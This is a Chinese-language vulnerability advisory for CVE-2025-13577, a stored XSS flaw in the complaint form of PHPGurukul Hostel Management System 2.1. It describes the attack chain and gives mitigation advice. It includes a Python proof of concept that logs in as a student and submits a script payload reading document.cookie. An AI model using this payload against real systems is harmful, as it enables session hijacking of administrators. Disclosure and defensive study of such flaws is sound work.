CVE-2025-13577: PHPGurukul学生宿舍管理系统存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13577

漏洞类型

XSS（跨站脚本）

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PHPGurukul Hostel Management System 2.1

漏洞概述

CVE-2025-13577是PHPGurukul Hostel Management System 2.1中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于学生投诉功能模块中，具体位于/register-complaint.php文件的cdetails参数。攻击者可以通过在投诉内容中注入恶意JavaScript代码，当其他用户（特别是管理员）查看投诉详情时，恶意脚本将在其浏览器上下文中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于该系统通常用于学校或机构管理学生住宿信息，漏洞可能影响大量用户数据安全。CVSS评分3.5，属于低危漏洞，主要因为需要低权限账户和用户交互才能触发。

技术细节

该存储型XSS漏洞源于PHPGurukul Hostel Management System 2.1在处理用户输入时缺乏充分的输入验证和输出编码。具体来说，/register-complaint.php文件接收cdetails参数的用户输入后，直接存储到数据库而未进行安全过滤。当管理员或相关用户通过系统界面查看投诉记录时，未经过滤的用户输入被直接渲染到HTML页面中。攻击者可以利用这一漏洞注入任意JavaScript代码，如<script>alert(document.cookie)</script>或更复杂的payload来窃取会话令牌。攻击者需要拥有系统低权限账户（如学生账号）即可提交恶意投诉内容，且需要诱导管理员查看该投诉才能触发漏洞。由于是存储型XSS，恶意脚本会持久存在于系统中，影响所有查看该投诉页面的用户。

攻击链分析

STEP 1

步骤1

攻击者获取系统低权限账户（如学生账号）

STEP 2

步骤2

攻击者构造恶意XSS payload并通过/register-complaint.php的cdetails参数提交

STEP 3

步骤3

恶意内容被存储到数据库，系统未进行输入验证和过滤

STEP 4

步骤4

管理员或相关用户查看投诉详情页面

STEP 5

步骤5

恶意JavaScript代码在受害者浏览器中执行，可窃取会话Cookie、劫持账户或进行钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13577 PoC - Stored XSS in PHPGurukul Hostel Management System
# Target: /register-complaint.php
# Parameter: cdetails

TARGET_URL = "http://target-site.com/register-complaint.php"
LOGIN_URL = "http://target-site.com/login.php"

# XSS Payload
xss_payload = "<script>alert(document.cookie)</script>"

# Step 1: Login with low-privilege account
session = requests.Session()
login_data = {
    "username": "student_user",
    "password": "password123"
}
response = session.post(LOGIN_URL, data=login_data)

# Step 2: Submit complaint with XSS payload in cdetails parameter
complaint_data = {
    "cdetails": xss_payload,
    "submit": "Submit"
}
response = session.post(TARGET_URL, data=complaint_data)

# Step 3: When admin views the complaint, XSS will be triggered
print("PoC executed: Malicious complaint submitted successfully")
print("Payload: " + xss_payload)

影响范围

PHPGurukul Hostel Management System 2.1

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)层面配置XSS防护规则，过滤cdetails参数中的<script>等危险标签；2) 对所有用户输入实施严格的输入验证，拒绝包含HTML标签和JavaScript特殊字符的输入；3) 在输出环节对用户提交的内容进行HTML实体转义；4) 限制低权限用户提交投诉的功能或增加人工审核流程；5) 监控日志及时发现异常的XSS攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13577
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13577
3 Details https://www.cvedetails.com/cve/CVE-2025-13577/
4 VulDB https://vuldb.com/cve/CVE-2025-13577
5 Link https://phpgurukul.com/
6 Link https://vuldb.com/?ctiid.333341
7 Link https://vuldb.com/?id.333341
8 Link https://vuldb.com/?submit.698995